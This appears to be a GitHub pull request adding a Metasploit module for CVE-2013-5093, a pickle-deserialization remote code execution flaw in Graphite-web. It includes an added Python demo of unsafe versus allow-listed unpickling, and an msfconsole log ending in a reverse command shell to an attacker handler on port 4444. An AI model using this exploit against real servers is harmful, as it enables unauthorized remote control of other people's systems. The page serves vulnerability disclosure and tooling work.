Graphite web: http://graphite.wikidot.com/
Versions affected: 0.9.5 up to and including 0.9.10
Installation guide: https://gist.github.com/jgeurts/3112065
The vulnerability was introduced in: graphite-project/graphite-web@71d395e
Note that in webapp/web/render/views.py, which is a publicly accessible URL by default (I have found no way of restricting access), a pickle can be loaded. Pickles are unsafe as they can contain commands that will be executed.
The routing for the exploit goes as follows, as defined in webapp/web/render/views.py:
The request to trigger it has to be formatted like:
Chart type, as an example, can be "line". This is then followed by a linebreak and then the pickle.
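As an added illustration (not code from this pull request or from graphite-web), the unsafe pattern the description refers to, modelled as a simplified handler that takes a chart type line followed by a pickle, beside a hardened variant that only resolves an explicit allow-list of globals. The handler functions, the allow-list and both sample bodies are constructed assumptions; the hostile sample names os.getcwd so that whether the deserializer called it is observable without side effects.

```python
import io
import os
import pickle

# Hypothetical handler modelled on the description: body is "<chart type>\n<pickle>".
# The stock deserializer calls whatever global the pickle names.
def render_unsafe(body: bytes):
    graph_type, _, pickled = body.partition(b"\n")
    return graph_type.decode(), pickle.loads(pickled)  # executes callables named in the pickle

# Hardened variant: find_class only resolves allow-listed names, so a pickle can
# still carry plain series data but cannot name an arbitrary callable.
ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set"),
           ("builtins", "str"), ("builtins", "int"), ("builtins", "float")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def render_safe(body: bytes):
    graph_type, _, pickled = body.partition(b"\n")
    return graph_type.decode(), RestrictedUnpickler(io.BytesIO(pickled)).load()

# Constructed sample bodies (not from the page): benign series data, and a
# pickle whose reduce step names os.getcwd (harmless, but proves a call happened).
BENIGN = b"line\n" + pickle.dumps([("cpu.load", [(0, 1.0), (60, 1.5)])])

class _NamesGlobal:
    def __reduce__(self):
        return (os.getcwd, ())

HOSTILE = b"line\n" + pickle.dumps(_NamesGlobal())

def demo():
    results = {}
    results["unsafe_benign"] = render_unsafe(BENIGN)[1]
    results["unsafe_hostile_called_global"] = render_unsafe(HOSTILE)[1] == os.getcwd()
    results["safe_benign"] = render_safe(BENIGN)[1]
    try:
        render_safe(HOSTILE)
        results["safe_hostile_blocked"] = False
    except pickle.UnpicklingError:
        results["safe_hostile_blocked"] = True
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```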
msf > use exploit/unix/webapp/graphite_pickle_exec
msf exploit(graphite_pickle_exec) > show options
Module options (exploit/unix/webapp/graphite_pickle_exec):
Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        Use a proxy chain
RHOST                       yes       The target address
RPORT      80               yes       The target port
TARGETURI  /                yes       The path to a vulnerable application
VHOST                       no        HTTP server virtual host
msf exploit(graphite_pickle_exec) > set RHOST 192.168.80.149
RHOST => 192.168.80.149
msf exploit(graphite_pickle_exec) > check
[*] The target appears to be vulnerable.
msf exploit(graphite_pickle_exec) > exploit
[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 39Dm9uxcphKQ5GwX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "39Dm9uxcphKQ5GwX\r\n"
[*] B is input...
[*] Command shell session 1 opened (192.168.80.129:4444 -> 192.168.80.149:57141) at 2013-08-07 19:14:59 -0400
Adding module for CVE 2013-5093, Graphite Web Exploit
This is a really good example of this type of vulnerability! Thanks!
Just asking the author to repeat the PR from a different branch than his master, as pointed out on the rapid7 wiki
Changes Unknown when pulling 3053233 on CharlieEriksen:master into ** on rapid7:master**.